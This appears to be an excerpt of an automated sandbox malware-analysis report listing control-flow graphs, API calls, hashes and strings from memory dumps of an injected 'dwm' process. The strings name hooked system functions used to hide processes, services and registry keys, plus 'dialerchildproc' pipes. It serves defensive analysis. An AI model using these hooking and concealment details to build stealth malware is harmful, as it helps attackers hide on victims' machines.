                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                • Instruction ID: 9e7846c2521f109a6f659ed3fc26864c08ecc25d5a75a4cba48512a367658751
                                                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                • Instruction Fuzzy Hash: 0431B131B1DA8C81EA709E15E85836A62F4F38478CF110525A5CD46BACDF7EC6548B08

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: aed99abd7715bdc8bb8c86b58ea50799c9fad67165679f88d8eeda714491b6ee
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: 68115E78F1864D81F7A19F22FD8EB75A2F0A75870CF4640259906851ECEF3BC288874C

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                                                • Instruction ID: 20a1bfbad8c4c13832f06a0afd573a8530230a5d89607e5c26a7025e083b3273
                                                                                • Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                                                • Instruction Fuzzy Hash: 35F01D76B18A4881D630DF05E84976A67F4E3887D8F154111B98D07BADCE3AC2818F04

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 26db1592908-26db1592973 call 26db1590f34 * 4 274 26db1592979-26db159297c 265->274 275 26db1592b8b 265->275 274->275 277 26db1592982-26db1592985 274->277 276 26db1592b8d-26db1592ba9 275->276 277->275 278 26db159298b-26db159298e 277->278 278->275 279 26db1592994-26db15929b2 VirtualAlloc 278->279 279->275 280 26db15929b8-26db15929dc call 26db1590d6c 279->280 283 26db1592a0b-26db1592a12 280->283 284 26db15929de-26db1592a09 call 26db1590d6c 280->284 286 26db1592a18-26db1592a25 283->286 287 26db1592ab2-26db1592ab9 283->287 284->283 286->287 291 26db1592a2b-26db1592a39 LoadLibraryA 286->291 288 26db1592b6c-26db1592b89 287->288 289 26db1592abf-26db1592ad6 287->289 288->276 289->288 292 26db1592adc 289->292 293 26db1592a3b-26db1592a45 291->293 294 26db1592a9d-26db1592aa5 291->294 297 26db1592ae2-26db1592af7 292->297 298 26db1592a48-26db1592a4c 293->298 294->291 295 26db1592aa7-26db1592aac 294->295 295->287 299 26db1592af9-26db1592b0a 297->299 300 26db1592b5b-26db1592b66 297->300 301 26db1592a9a 298->301 302 26db1592a4e-26db1592a52 298->302 304 26db1592b15-26db1592b19 299->304 305 26db1592b0c-26db1592b13 299->305 300->288 300->297 301->294 306 26db1592a7d-26db1592a87 302->306 307 26db1592a54-26db1592a7b 302->307 309 26db1592b1b-26db1592b22 304->309 310 26db1592b24-26db1592b28 304->310 308 26db1592b48-26db1592b59 305->308 311 26db1592a8d-26db1592a98 306->311 307->311 308->299 308->300 309->308 312 26db1592b3a-26db1592b3e 310->312 313 26db1592b2a-26db1592b38 310->313 311->298 312->308 314 26db1592b40-26db1592b43 312->314 313->308 314->308
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: 9918a829e56c3c314990f3a7eca28bd584177b04c7289041ca44f1b57f6a9e83
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: B4611332B0125987EA68CF15D85877CB3F2FB04BD8F168025DA1907789DB3AE852C70A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0000026DB15C1650: GetProcessHeap.KERNEL32 ref: 0000026DB15C165B
                                                                                  • Part of subcall function 0000026DB15C1650: HeapAlloc.KERNEL32 ref: 0000026DB15C166A
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C16DA
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1707
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1721
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1741
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C175C
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C177C
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1797
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C17B7
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C17D2
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C17F2
                                                                                • Sleep.KERNEL32 ref: 0000026DB15C1C43
                                                                                • SleepEx.KERNELBASE ref: 0000026DB15C1C49
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C180D
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C182D
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1848
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1868
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1883
                                                                                  • Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C18A3
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C18BE
                                                                                  • Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C18C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: cacc333e1e9da25418c512471dae44125ad6b8f22e1267be9d4bd16534817dcc
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 15312D75B00A09D1FB50AF37DEC837A13F5AB44BD8F5A4021DE098769EEE26C890C358

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 354 26db15f2908-26db15f2973 call 26db15f0f34 * 4 363 26db15f2b8b 354->363 364 26db15f2979-26db15f297c 354->364 366 26db15f2b8d-26db15f2ba9 363->366 364->363 365 26db15f2982-26db15f2985 364->365 365->363 367 26db15f298b-26db15f298e 365->367 367->363 368 26db15f2994-26db15f29b2 VirtualAlloc 367->368 368->363 369 26db15f29b8-26db15f29dc call 26db15f0d6c 368->369 372 26db15f2a0b-26db15f2a12 369->372 373 26db15f29de-26db15f2a09 call 26db15f0d6c 369->373 375 26db15f2a18-26db15f2a25 372->375 376 26db15f2ab2-26db15f2ab9 372->376 373->372 375->376 380 26db15f2a2b-26db15f2a39 375->380 378 26db15f2b6c-26db15f2b89 376->378 379 26db15f2abf-26db15f2ad6 376->379 378->366 379->378 381 26db15f2adc 379->381 387 26db15f2a3b-26db15f2a45 380->387 388 26db15f2a9d-26db15f2aa5 380->388 383 26db15f2ae2-26db15f2af7 381->383 385 26db15f2b5b-26db15f2b66 383->385 386 26db15f2af9-26db15f2b0a 383->386 385->378 385->383 392 26db15f2b0c-26db15f2b13 386->392 393 26db15f2b15-26db15f2b19 386->393 389 26db15f2a48-26db15f2a4c 387->389 388->380 390 26db15f2aa7-26db15f2aac 388->390 396 26db15f2a9a 389->396 397 26db15f2a4e-26db15f2a52 389->397 390->376 398 26db15f2b48-26db15f2b59 392->398 394 26db15f2b1b-26db15f2b22 393->394 395 26db15f2b24-26db15f2b28 393->395 394->398 399 26db15f2b3a-26db15f2b3e 395->399 400 26db15f2b2a-26db15f2b38 395->400 396->388 401 26db15f2a54-26db15f2a7b 397->401 402 26db15f2a7d-26db15f2a87 397->402 398->385 398->386 399->398 404 26db15f2b40-26db15f2b43 399->404 400->398 403 26db15f2a8d-26db15f2a98 401->403 402->403 403->389 404->398
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: 6bc1ca590bee73cfb4dbfeebf7ea37e70500ae367b65946061f84e7fdeb867c2
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: 2E6113B2F0125C83EA68CF15D85877DB3E2FB04B98F458021DE5947B89DB3AD852C708

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 476 26db15c2cdc-26db15c2d55 call 26db15decc0 479 26db15c2d5b-26db15c2d61 476->479 480 26db15c3090-26db15c30b3 476->480 479->480 481 26db15c2d67-26db15c2d6a 479->481 481->480 482 26db15c2d70-26db15c2d73 481->482 482->480 483 26db15c2d79-26db15c2d89 GetModuleHandleA 482->483 484 26db15c2d8b-26db15c2d9b GetProcAddress 483->484 485 26db15c2d9d 483->485 486 26db15c2da0-26db15c2dbe 484->486 485->486 486->480 488 26db15c2dc4-26db15c2de3 StrCmpNIW 486->488 488->480 489 26db15c2de9-26db15c2ded 488->489 489->480 490 26db15c2df3-26db15c2dfd 489->490 490->480 491 26db15c2e03-26db15c2e0a 490->491 491->480 492 26db15c2e10-26db15c2e23 491->492 493 26db15c2e25-26db15c2e31 492->493 494 26db15c2e33 492->494 495 26db15c2e36-26db15c2e3a 493->495 494->495 496 26db15c2e4a 495->496 497 26db15c2e3c-26db15c2e48 495->497 498 26db15c2e4d-26db15c2e57 496->498 497->498 499 26db15c2f4d-26db15c2f51 498->499 500 26db15c2e5d-26db15c2e60 498->500 503 26db15c2f57-26db15c2f5a 499->503 504 26db15c3082-26db15c308a 499->504 501 26db15c2e72-26db15c2e7c 500->501 502 26db15c2e62-26db15c2e6f call 26db15c1a14 500->502 506 26db15c2e7e-26db15c2e8b 501->506 507 26db15c2eb0-26db15c2eba 501->507 502->501 508 26db15c2f6b-26db15c2f75 503->508 509 26db15c2f5c-26db15c2f68 call 26db15c1a14 503->509 504->480 504->492 506->507 513 26db15c2e8d-26db15c2e9a 506->513 514 26db15c2eea-26db15c2eed 507->514 515 26db15c2ebc-26db15c2ec9 507->515 510 26db15c2fa5-26db15c2fa8 508->510 511 26db15c2f77-26db15c2f84 508->511 509->508 518 26db15c2faa-26db15c2fb3 call 26db15c1d28 510->518 519 26db15c2fb5-26db15c2fc2 lstrlenW 510->519 511->510 517 26db15c2f86-26db15c2f93 511->517 520 26db15c2e9d-26db15c2ea3 513->520 522 26db15c2efb-26db15c2f08 lstrlenW 514->522 523 26db15c2eef-26db15c2ef9 call 26db15c1d28 514->523 515->514 521 26db15c2ecb-26db15c2ed8 515->521 525 26db15c2f96-26db15c2f9c 517->525 518->519 536 26db15c2ffa-26db15c3005 518->536 531 26db15c2fe5-26db15c2fef call 26db15c3930 519->531 532 26db15c2fc4-26db15c2fce 519->532 529 26db15c2ea9-26db15c2eae 520->529 530 26db15c2f43-26db15c2f48 520->530 533 26db15c2edb-26db15c2ee1 521->533 526 26db15c2f0a-26db15c2f14 522->526 527 26db15c2f2b-26db15c2f3d call 26db15c3930 522->527 523->522 523->530 525->536 537 26db15c2f9e-26db15c2fa3 525->537 526->527 538 26db15c2f16-26db15c2f29 call 26db15c1554 526->538 527->530 541 26db15c2ff2-26db15c2ff4 527->541 529->507 529->520 530->541 531->541 532->531 542 26db15c2fd0-26db15c2fe3 call 26db15c1554 532->542 533->530 543 26db15c2ee3-26db15c2ee8 533->543 545 26db15c307c-26db15c3080 536->545 546 26db15c3007-26db15c300b 536->546 537->510 537->525 538->527 538->530 541->504 541->536 542->531 542->536 543->514 543->533 545->504 551 26db15c3013-26db15c302d call 26db15c86a0 546->551 552 26db15c300d-26db15c3011 546->552 555 26db15c3030-26db15c3033 551->555 552->551 552->555 558 26db15c3035-26db15c3053 call 26db15c86a0 555->558 559 26db15c3056-26db15c3059 555->559 558->559 559->545 561 26db15c305b-26db15c3079 call 26db15c86a0 559->561 561->545
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: cf41c2ea798174bafbe0ab8e0fb45ddfa32491c29c50c0b4dc319edd19605347
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: EFB19F72B10A9D85EBA49F29C8487B963F4F744B88F565016EE0953798DF36CD80C748
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: c9df99479bdc5a59bf929ff00e2905804cc289a5608fb6890d8407a4387a3456
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: 17318D72701B849AEB608F61EC847ED73B4F784748F45442ADA4E47B98EF39C648CB08
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: a70aecc7f73f5432ad6ef5706504d1df030883270d0ee720a7de0405caa02526
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: F1315C76704B8496DB60CF25EC447AE73B4F788798F510116EA9D43B98EF39C685CB04
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: b62691d81bb7d288a3e40c9db4a203c3aaa6d45fefea2a752f024e8cbccdb530
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: DFE11E32B04AC88AE700CF66D8886EE7BF1F34578CF518116EE4A57B99DE39C51AC704

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: 0e21a81b8937915537ed683bfac93295cc0a335c399a6a75fed8fbacfbcc086e
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: 895182B2B04B89D3EB54CF62E9887AAB7F1F788B88F058124DA4907B18DF39C155C744

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: ce399990c72d9467439a05634a8f08f1dae0e2b665e31c63d02aceababf8b6ca
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 8B31A978F1198EA0EB04DFAAEC59AF523B1F78474CFC3552395191217D9FBA8289C348

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: c5ffe1c465f459f895d9f757d1d87a7b48da7c64cef122a04913fb24b78c1974
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: D9214175B14B8883F7108B25F84876A73F0F389BA8F554215DA5942BACDF7EC149CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: b211777bad8d4e9972588cf5136c4927e9e271737edffc2b3743247b2021ccd6
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: 5D417273614B84D7E7608F62E9487AAB7F1F388788F018125DB8907B58DF39D155CB04
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: b893fcb06e2d661fbd63b9b1b7a83e24404f702c7a776363a0b714a0737def66
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: DD81C131F1028D86FB50AB269C4D3B966F5EB857CCF464025AA09437DEDB3BC94D870A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 2cef070fa1fb0c1a6724bc96a087d6a01ddb94cc5977adf608eac8f3a99076c3
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 9581E631F0024E86FA509B26DC8D37967F0EB4578CF474429AA4543F9EDB7BC8468708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 8365de42946ef7b5008fe86676e1c428508fd5c71a0eda70c0f22b572063bb37
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: AA81E271F0028D86FB909F2A9C4D77A62F8AB4578CF0A80559A0487FDEDF7BC8418708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: eb1cb1331f8bf70322539c4389247280a13e7dffa339ecebf8b4bc03216181eb
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 0831C235B02A8991EF119F12AC087BA63F4BB08BA8F5B4524ED2D0739CEF39C545C308
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: 042f183bb11a4c8e844324c3b84d2c748b55f776c196af0957ac092105eee780
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: 86118271B14B8886E7508B57EC48B2972F0F788FE8F054224EA5D877A8DF7AC5048748
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: ef762082be70469285576cf51060e882a679152a7b293b57e12cda9b2d7ffaf3
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 2531C431B05B5D86EB91DF56EC4867967F0FB84B88F0640209E4807B58EF3AC6A1C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
